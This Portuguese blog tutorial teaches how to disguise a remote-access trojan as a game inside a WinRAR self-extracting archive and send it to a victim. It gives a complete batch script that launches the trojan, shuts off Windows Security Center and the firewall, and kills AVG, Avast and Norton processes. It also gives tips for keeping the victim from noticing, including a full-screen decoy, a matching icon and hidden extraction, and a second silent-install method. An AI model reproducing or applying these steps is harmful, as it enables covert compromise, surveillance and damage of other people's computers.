Deixando trojan indetectavel





Tutorial – Trojan indetectável (Duas das formas)

Com este tutorial você irá aprender a deixar um trojan indetectável com o Winrar,

fazendo um bom uso das configurações SFX que o programa disponibiliza.

Vai da criatividade de cada um a forma de executar os comandos contidos no nosso

“pacote de objetos maliciosos”, vou mostrar uma forma bem básica de executar um

trojan e desabilitar as defesas do Firewall sem que a vítima note!

Pra isso será necessário:

Winrar:

~> http://baixaki.ig.com.br/download/WinRAR.htm

Um jogo qualquer (pode ser qualquer outro arquivo de sua preferência) que pode ser

encontrado aqui:

~> http://www.baixaki.com

Bloco de notas:

~> Iniciar / Programas / Acessórios

Um Servidor de algum programa de monitoração remota (netbus, prorat, turkojan,

enfim qualquer trojan), que chamarei de server.exe.

Siga as seguintes etapas:

1°) Se for usar o mesmo jogo que mencionei, descompacte-o em uma pasta qualquer

(vamos dizer C:\).

2°) Digite (ou copie e cole) os seguintes comandos no bloco de notas:

@echo off
Start server.exe
break off
cd\
net stop wscsvc >nul
sc config wscsvc start= disabled
cls
netsh firewall set opmode mode=disable >nul
net stop SharedAccess >nul
goto avg
:avg
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgamsvr.exe >nul
taskkill /f /im avgupsvc.exe >nul
taskkill /f /im avgw.exe >nul
taskkill /f /im avgcc32.exe >nul
taskkill /f /im avgctrl.exe >nul
taskkill /f /im avgserv.exe >nul
taskkill /f /im avgserv9.exe >nul
taskkill /f /im avgserv9schedapp.exe >nul
taskkill /f /im avgw.exe >nul
goto avast
:avast
taskkill /f /im ashwebsv.exe >nul
taskkill /f /im ashdisp.exe >nul
taskkill /f /im ashmaisv.exe >nul
taskkill /f /im ashserv.exe >nul
taskkill /f /im ashwebsv.exe >nul
goto norton
:norton
taskkill /f /im norton.exe >nul
taskkill /f /im Norton Auto-Protect.exe >nul
taskkill /f /im norton_av.exe >nul
taskkill /f /im nortonav.exe >nul
msg * End of instalation!
exit
:
3°) Salve na extensão .bat (comando do MS-DOS) – Com estes comandos,

desabilitaremos o Firewall da vítima (se for do Windows) e também o antivírus (se for:

AVG, Norton ou Avast), que aqui neste caso irei chamar de Arquivo.bat.

4°)Agora deixe na mesma pasta todos os arquivos que nos interessa: Todos os do

jogo, o Server.exe e o arquivo.exe.

5°)Selecione todos os arquivos e clique com o botão direito do mouse e vá em

“Adicionar para o arquivo” (opção com o Winrar instalado).

6°)Na primeira aba “Geral” escolha o caminho para a criação do arquivo e em “Opções

de compressão” marque a opção “Criar arquivo SFX”; Na aba “Avançado” clique em

“Opções SFX” e deverá abrir outra janela, onde você irá escolher o caminho para a

extração no PC da vítima (ela pode mudar depois se quiser), vamos usar como

exemplo C:\ e em “Configuração do Programa” preencha o campo “Executar após a

extração” com o nome do arquivo de comando do DOS, neste caso: arquivo.bat. Clique

em OK e em OK novamente.

7°) O arquivo deverá ser criado na pasta que você escolheu!

8°) De preferência, troque o ícone por um relativo ao jogo e mande pra quem você

quer observar, deste modo pode ser feito com badcom´s, faça o mesmo procedimento

e vocêpoderá ferrar com o PC de alguém!

OBS:

~> Esta é uma das maneiras que se tem do AV não detectar o trojan (como visto, não

serve pra qualquer AV).

~> Na escolha do arquivo de disfarce, de preferência escolha um que ocupe toda a

tela do PC, pois quando se der a instalação irá se abrir a janela do prompt de

comando do DOS e se a vítima perceber os processos se finalizando poderá por em

risco a eficácia do plano.

~> Não escolha um arquivo muito pesado, já que ele será apenas o disfarce do trojan.

~> Sabendo um pouco de comandos do DOS em arquivos .bat, use da criatividade pra

deixar mais eficaz o arquivo de instalação do Winrar.

~> Aproveite os outros tópicos para criar um trojan e este para colocá-lo em ação!
Mais um jeito fácil ai com WINRAR

1° clica com o botão direito sobre o executável (o vírus) e clica em adicionar para o arquivo

2º Irá abrir uma janela, mude de .rar para .exe.

3º Clique na aba Avançado e depois em Opções SFX..., Põem o nome do arquivo que será executado, no caso o nome do vírus que você esta camuflando.

4º Clique na aba Métodos e marque as Opções Ocultar Tudo e Ignorar arquivos existentes.

5º Clique na aba Texto e Ícone e clique em Procurar...

6º Use um ícone que sua vitima não possa desconfiar no tutorial eu usei de uma imagem..

Nenhum comentário:

Postar um comentário